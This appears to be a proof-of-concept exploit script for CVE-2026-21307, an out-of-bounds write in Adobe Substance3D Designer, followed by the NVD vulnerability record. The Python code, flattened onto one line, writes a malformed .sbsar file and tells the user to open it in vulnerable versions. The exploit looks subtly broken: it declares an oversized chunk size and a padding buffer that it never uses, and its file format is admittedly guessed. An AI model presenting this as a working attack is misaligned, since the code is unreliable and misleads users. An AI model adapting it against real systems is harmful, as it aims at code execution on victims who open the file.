CVE-2026-21307

#!/usr/bin/env python3 # CVE-2026-21307 PoC - Adobe Substance3D Designer Out-of-Bounds Write # This PoC creates a malformed .sbsar file to trigger the vulnerability # WARNING: For educational and research purposes only import struct import os def create_malicious_sbsar(): """ Create a malicious .sbsar file that triggers OOB write in Adobe Substance3D Designer The file structure is based on known sbsar format specifications """ # SBSAR file header (simplified structure) header = b'SBSAR' # Magic bytes header += struct.pack('<I', 0x00000001) # Version header += struct.pack('<I', 0x00000001) # Flags # Create malicious data that will trigger OOB write # The pattern causes buffer overflow when parsed malicious_chunk_size = 0xFFFFFFFF # Oversized chunk size malicious_data = b'\x41' * 0x10000 # Large padding data # Malformed package info chunk package_header = b'PKGI' # Package header identifier package_size = 0x00001000 # Small size value package_data = b'\x00' * package_size # Malformed graph chunk with oversized content graph_header = b'GRPH' # Graph identifier graph_content = b'\x90' * 0x20000 # Large repeated bytes # End marker end_marker = b'END\x00' # Combine all parts sbsar_content = header + package_header + struct.pack('<I', package_size) + package_data sbsar_content += graph_header + struct.pack('<I', len(graph_content)) + graph_content sbsar_content += end_marker return sbsar_content def save_poc_file(filename='CVE-2026-21307_malicious.sbsar'): """Save the PoC file to disk""" content = create_malicious_sbsar() with open(filename, 'wb') as f: f.write(content) print(f'[+] PoC file created: {filename}') print(f'[+] File size: {len(content)} bytes') print('[+] Instructions: Open this file with Adobe Substance3D Designer <= 15.0.3') return filename if __name__ == '__main__': save_poc_file() print('[+] PoC generation complete')

{"cve": {"id": "CVE-2026-21307", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:09.763", "lastModified": "2026-01-14T17:57:42.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Designer versions 15.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones 15.0.3 y anteriores de Substance3D - Designer están afectadas por una vulnerabilidad de escritura fuera de límites que podría resultar en ejecución de código arbitrario en el contexto del usuario actual. La explotación de este problema requiere interacción del usuario en el sentido de que la víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_designer:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.1.0", "matchCriteriaId": "A490AE76-8B57-4B39-9A8A-0327D3C8E592"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_designer/apsb26-13.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}